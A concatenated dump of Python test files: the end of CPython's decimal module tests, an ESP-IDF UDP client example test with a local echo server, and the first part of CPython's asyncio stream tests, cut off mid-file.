self.assertEqual(Decimal("40E9").sqrt(), Decimal('2.0E+5'))
self.assertEqual(divmod(Decimal(10), 3), (3, 1))
self.assertEqual(Decimal(10) // 3, 3)
self.assertEqual(Decimal(4) / 2, 2)
self.assertEqual(Decimal(400) ** -1, Decimal('0.0025'))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
for attr in dir(P):
if attr.startswith('_'):
continue
p_func = getattr(P, attr)
c_func = getattr(C, attr)
if (attr == 'Decimal' or attr == 'Context' or
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x for x in p_sig.parameters.keys() if not
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
c_kind = [x.kind for x in c_sig.parameters.values()]
p_kind = [x[1].kind for x in p_sig.parameters.items() if not
x[0].startswith('_')]
# parameters:
if attr != 'setcontext':
self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch in %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
def mkargs(module, sig):
args = []
kwargs = {}
for name, param in sig.parameters.items():
if name == 'self': continue
if param.kind == POS:
args.append(pdict[module][name])
elif param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
else:
raise TestFailed("unexpected parameter kind")
return args, kwargs
def tr(s):
"""The C Context docstrings use 'x' in order to prevent confusion
with the article 'a' in the descriptions."""
if s == 'x': return 'a'
if s == 'y': return 'b'
if s == 'z': return 'c'
return s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
for attr in dir(p_type):
if attr.startswith('_'):
continue
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
if inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) for x in c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
p_kind = [x.kind for x in p_sig.parameters.values()]
c_kind = [x.kind for x in c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
if ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch in %s" % p_func)
else: # Context methods are positional only in the C version.
self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch in %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
try:
getattr(c_type(9), attr)(*args, **kwds)
except Exception:
raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
try:
getattr(p_type(9), attr)(*args, **kwds)
except Exception:
raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure insures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
if not orig_sys_decimal is sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
example_test.py | # This example code is in the Public Domain (or CC0 licensed, at your option.)
# Unless required by applicable law or agreed to in writing, this
# software is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied.
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from builtins import input
import os
import re
import netifaces
import socket
from threading import Thread, Event
import ttfw_idf
import sys
# ----------- Config ----------
PORT = 3333
INTERFACE = 'eth0'
# -------------------------------
def get_my_ip(type):
for i in netifaces.ifaddresses(INTERFACE)[type]:
return i['addr'].replace("%{}".format(INTERFACE), "")
class UdpServer:
def __init__(self, port, family_addr, persist=False):
self.port = port
self.family_addr = family_addr
self.socket = socket.socket(family_addr, socket.SOCK_DGRAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.settimeout(30.0)
self.shutdown = Event()
self.persist = persist
def __enter__(self):
try:
self.socket.bind(('', self.port))
except socket.error as e:
print("Bind failed:{}".format(e))
raise
self.server_thread = Thread(target=self.run_server)
self.server_thread.start()
return self
def __exit__(self, exc_type, exc_value, traceback):
if self.persist:
sock = socket.socket(self.family_addr, socket.SOCK_DGRAM)
sock.sendto(b'Stop', ('localhost', self.port))
sock.close()
self.shutdown.set()
self.server_thread.join()
self.socket.close()
def run_server(self):
while not self.shutdown.is_set():
try:
data, addr = self.socket.recvfrom(1024)
if not data:
return
data = data.decode()
print('Reply[' + addr[0] + ':' + str(addr[1]) + '] - ' + data)
reply = 'OK: ' + data
self.socket.sendto(reply.encode(), addr)
except socket.error as e:
print("Running server failed:{}".format(e))
raise
if not self.persist:
break
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_socket(env, extra_data):
"""
steps:
1. join AP
2. have the board connect to the server
3. send and receive data
"""
dut1 = env.get_dut("udp_client", "examples/protocols/sockets/udp_client", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "udp_client.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("udp_client_bin_size", "{}KB".format(bin_size // 1024))
# start test
dut1.start_app()
data = dut1.expect(re.compile(r" IPv4 address: ([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"), timeout=30)
print("Connected with IPv4: {}".format(data[0]))
# test IPv4
with UdpServer(PORT, socket.AF_INET):
dut1.write(get_my_ip(netifaces.AF_INET))
dut1.expect(re.compile(r"OK: Message from ESP32"))
# test IPv6
with UdpServer(PORT, socket.AF_INET6):
dut1.write(get_my_ip(netifaces.AF_INET6))
dut1.expect(re.compile(r"OK: Message from ESP32"))
if __name__ == '__main__':
if sys.argv[1:] and sys.argv[1].startswith("IPv"): # if additional arguments provided:
# Usage: example_test.py <IPv4|IPv6>
family_addr = socket.AF_INET6 if sys.argv[1] == "IPv6" else socket.AF_INET
with UdpServer(PORT, family_addr, persist=True) as s:
print(input("Press Enter stop the server..."))
else:
test_examples_protocol_socket()
|
test_streams.py | """Tests for streams.py."""
import contextlib
import gc
import io
import os
import queue
import pickle
import socket
import sys
import threading
import unittest
from unittest import mock
from test import support
try:
import ssl
except ImportError:
ssl = None
import asyncio
from asyncio.streams import _StreamProtocol, _ensure_can_read, _ensure_can_write
from test.test_asyncio import utils as test_utils
def tearDownModule():
asyncio.set_event_loop_policy(None)
class StreamModeTests(unittest.TestCase):
def test__ensure_can_read_ok(self):
self.assertIsNone(_ensure_can_read(asyncio.StreamMode.READ))
self.assertIsNone(_ensure_can_read(asyncio.StreamMode.READWRITE))
def test__ensure_can_read_fail(self):
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
_ensure_can_read(asyncio.StreamMode.WRITE)
def test__ensure_can_write_ok(self):
self.assertIsNone(_ensure_can_write(asyncio.StreamMode.WRITE))
self.assertIsNone(_ensure_can_write(asyncio.StreamMode.READWRITE))
def test__ensure_can_write_fail(self):
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
_ensure_can_write(asyncio.StreamMode.READ)
class StreamTests(test_utils.TestCase):
DATA = b'line1\nline2\nline3\n'
def setUp(self):
super().setUp()
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
@mock.patch('asyncio.streams.events')
def test_ctor_global_loop(self, m_events):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
_asyncio_internal=True)
self.assertIs(stream._loop, m_events.get_event_loop.return_value)
def _basetest_open_connection(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with self.assertWarns(DeprecationWarning):
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
self.assertEqual(messages, [])
def test_open_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_open_unix_connection(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
def _basetest_open_connection_no_loop_ssl(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
try:
with self.assertWarns(DeprecationWarning):
reader, writer = self.loop.run_until_complete(
open_connection_fut)
finally:
asyncio.set_event_loop(None)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
self.assertEqual(messages, [])
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_connection_no_loop_ssl(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_connection(
*httpd.address,
ssl=test_utils.dummy_ssl_context(),
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_unix_connection_no_loop_ssl(self):
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_unix_connection(
httpd.address,
ssl=test_utils.dummy_ssl_context(),
server_hostname='',
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
def _basetest_open_connection_error(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with self.assertWarns(DeprecationWarning):
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer._protocol.connection_lost(ZeroDivisionError())
f = reader.read()
with self.assertRaises(ZeroDivisionError):
self.loop.run_until_complete(f)
writer.close()
test_utils.run_briefly(self.loop)
self.assertEqual(messages, [])
def test_open_connection_error(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
@support.skip_unless_bind_unix_socket
def test_open_unix_connection_error(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
def test_feed_empty_data(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'')
self.assertEqual(b'', stream._buffer)
def test_feed_nonempty_data(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(self.DATA)
self.assertEqual(self.DATA, stream._buffer)
def test_read_zero(self):
# Read zero bytes.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(self.DATA)
data = self.loop.run_until_complete(stream.read(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
def test_read(self):
# Read bytes.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
read_task = self.loop.create_task(stream.read(30))
def cb():
stream._feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA, data)
self.assertEqual(b'', stream._buffer)
def test_read_line_breaks(self):
# Read bytes without line breaks.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'line1')
stream._feed_data(b'line2')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'line1', data)
self.assertEqual(b'line2', stream._buffer)
def test_read_eof(self):
# Read bytes, stop at eof.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
read_task = self.loop.create_task(stream.read(1024))
def cb():
stream._feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'', data)
self.assertEqual(b'', stream._buffer)
def test_read_until_eof(self):
# Read all bytes until eof.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
read_task = self.loop.create_task(stream.read(-1))
def cb():
stream._feed_data(b'chunk1\n')
stream._feed_data(b'chunk2')
stream._feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1\nchunk2', data)
self.assertEqual(b'', stream._buffer)
def test_read_exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'line\n')
data = self.loop.run_until_complete(stream.read(2))
self.assertEqual(b'li', data)
stream._set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.read(2))
def test_invalid_limit(self):
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=0, loop=self.loop,
_asyncio_internal=True)
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=-1, loop=self.loop,
_asyncio_internal=True)
def test_read_limit(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=3, loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'chunk')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readline(self):
# Read one line. 'readline' will need to wait for the data
# to come from 'cb'
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'chunk1 ')
read_task = self.loop.create_task(stream.readline())
def cb():
stream._feed_data(b'chunk2 ')
stream._feed_data(b'chunk3 ')
stream._feed_data(b'\n chunk4')
self.loop.call_soon(cb)
line = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1 chunk2 chunk3 \n', line)
self.assertEqual(b' chunk4', stream._buffer)
def test_readline_limit_with_existing_data(self):
# Read one line. The data is in Stream's buffer
# before the event loop is run.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=3, loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'li')
stream._feed_data(b'ne1\nline2\n')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer should contain the remaining data after exception
self.assertEqual(b'line2\n', stream._buffer)
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=3, loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'li')
stream._feed_data(b'ne1')
stream._feed_data(b'li')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# No b'\n' at the end. The 'limit' is set to 3. So before
# waiting for the new data in buffer, 'readline' will consume
# the entire buffer, and since the length of the consumed data
# is more than 3, it will raise a ValueError. The buffer is
# expected to be empty now.
self.assertEqual(b'', stream._buffer)
def test_at_eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
self.assertFalse(stream.at_eof())
stream._feed_data(b'some data\n')
self.assertFalse(stream.at_eof())
self.loop.run_until_complete(stream.readline())
self.assertFalse(stream.at_eof())
stream._feed_data(b'some data\n')
stream._feed_eof()
self.loop.run_until_complete(stream.readline())
self.assertTrue(stream.at_eof())
def test_readline_limit(self):
# Read one line. Streams are fed with data after
# their 'readline' methods are called.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=7, loop=self.loop,
_asyncio_internal=True)
def cb():
stream._feed_data(b'chunk1')
stream._feed_data(b'chunk2')
stream._feed_data(b'chunk3\n')
stream._feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer had just one line of data, and after raising
# a ValueError it should be empty.
self.assertEqual(b'', stream._buffer)
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=7, loop=self.loop,
_asyncio_internal=True)
def cb():
stream._feed_data(b'chunk1')
stream._feed_data(b'chunk2\n')
stream._feed_data(b'chunk3\n')
stream._feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'chunk3\n', stream._buffer)
# check strictness of the limit
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=7, loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'1234567\n')
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'1234567\n', line)
self.assertEqual(b'', stream._buffer)
stream._feed_data(b'12345678\n')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
stream._feed_data(b'12345678')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readline_nolimit_nowait(self):
# All needed data for the first 'readline' call will be
# in the buffer.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(self.DATA[:6])
stream._feed_data(self.DATA[6:])
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line1\n', line)
self.assertEqual(b'line2\nline3\n', stream._buffer)
def test_readline_eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'some data')
stream._feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'some data', line)
def test_readline_empty_eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', line)
def test_readline_read_byte_count(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(self.DATA)
self.loop.run_until_complete(stream.readline())
data = self.loop.run_until_complete(stream.read(7))
self.assertEqual(b'line2\nl', data)
self.assertEqual(b'ine3\n', stream._buffer)
def test_readline_exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line\n', data)
stream._set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readuntil_separator(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
with self.assertRaisesRegex(ValueError, 'Separator should be'):
self.loop.run_until_complete(stream.readuntil(separator=b''))
def test_readuntil_multi_chunks(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(separator=b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream._feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream._feed_data(b'lineAAAxxx')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'xxx', stream._buffer)
def test_readuntil_multi_chunks_1(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'QWEaa')
stream._feed_data(b'XYaa')
stream._feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream._feed_data(b'QWEaa')
stream._feed_data(b'XYa')
stream._feed_data(b'aa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream._feed_data(b'aaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'aaa', data)
self.assertEqual(b'', stream._buffer)
stream._feed_data(b'Xaaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'Xaaa', data)
self.assertEqual(b'', stream._buffer)
stream._feed_data(b'XXX')
stream._feed_data(b'a')
stream._feed_data(b'a')
stream._feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'XXXaaa', data)
self.assertEqual(b'', stream._buffer)
def test_readuntil_eof(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'some dataAA')
stream._feed_eof()
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(cm.exception.partial, b'some dataAA')
self.assertIsNone(cm.exception.expected)
self.assertEqual(b'', stream._buffer)
def test_readuntil_limit_found_sep(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop, limit=3,
_asyncio_internal=True)
stream._feed_data(b'some dataAA')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'not found') as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAA', stream._buffer)
stream._feed_data(b'A')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'is found') as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAAA', stream._buffer)
def test_readexactly_zero_or_less(self):
# Read exact number of bytes (zero or less).
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(self.DATA)
data = self.loop.run_until_complete(stream.readexactly(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
with self.assertRaisesRegex(ValueError, 'less than zero'):
self.loop.run_until_complete(stream.readexactly(-1))
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly(self):
# Read exact number of bytes.
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
n = 2 * len(self.DATA)
read_task = self.loop.create_task(stream.readexactly(n))
def cb():
stream._feed_data(self.DATA)
stream._feed_data(self.DATA)
stream._feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA + self.DATA, data)
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly_limit(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
limit=3, loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'chunk')
data = self.loop.run_until_complete(stream.readexactly(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readexactly_eof(self):
# Read exact number of bytes (eof).
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
n = 2 * len(self.DATA)
read_task = self.loop.create_task(stream.readexactly(n))
def cb():
stream._feed_data(self.DATA)
stream._feed_eof()
self.loop.call_soon(cb)
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(read_task)
self.assertEqual(cm.exception.partial, self.DATA)
self.assertEqual(cm.exception.expected, n)
self.assertEqual(str(cm.exception),
'18 bytes read on a total of 36 expected bytes')
self.assertEqual(b'', stream._buffer)
def test_readexactly_exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
stream._feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readexactly(2))
self.assertEqual(b'li', data)
stream._set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readexactly(2))
def test_exception(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
self.assertIsNone(stream.exception())
exc = ValueError()
stream._set_exception(exc)
self.assertIs(stream.exception(), exc)
def test_exception_waiter(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
async def set_err():
stream._set_exception(ValueError())
t1 = self.loop.create_task(stream.readline())
t2 = self.loop.create_task(set_err())
self.loop.run_until_complete(asyncio.wait([t1, t2]))
self.assertRaises(ValueError, t1.result)
def test_exception_cancel(self):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop,
_asyncio_internal=True)
t = self.loop.create_task(stream.readline())
test_utils.run_briefly(self.loop)
t.cancel()
test_utils.run_briefly(self.loop)
# The following line fails if set_exception() isn't careful.
stream._set_exception(RuntimeError('message'))
test_utils.run_briefly(self.loop)
self.assertIs(stream._waiter, None)
def test_start_server(self):
class MyServer:
def __init__(self, loop):
self.server = None
self.loop = loop
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
await client_writer.wait_closed()
def start(self):
sock = socket.create_server(('127.0.0.1', 0))
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client,
sock=sock,
loop=self.loop))
return sock.getsockname()
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
sock = socket.create_server(('127.0.0.1', 0))
addr = sock.getsockname()
sock.close()
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client_callback,
host=addr[0], port=addr[1],
loop=self.loop))
return addr
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(addr):
with self.assertWarns(DeprecationWarning):
reader, writer = await asyncio.open_connection(
*addr, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
await writer.wait_closed()
return msgback
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
# test the server variant with a coroutine as client handler
server = MyServer(self.loop)
with self.assertWarns(DeprecationWarning):
addr = server.start()
msg = self.loop.run_until_complete(self.loop.create_task(client(addr)))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
server = MyServer(self.loop)
with self.assertWarns(DeprecationWarning):
addr = server.start_callback()
msg = self.loop.run_until_complete(self.loop.create_task(client(addr)))
server.stop()
self.assertEqual(msg, b"hello world!\n")
self.assertEqual(messages, [])
@support.skip_unless_bind_unix_socket
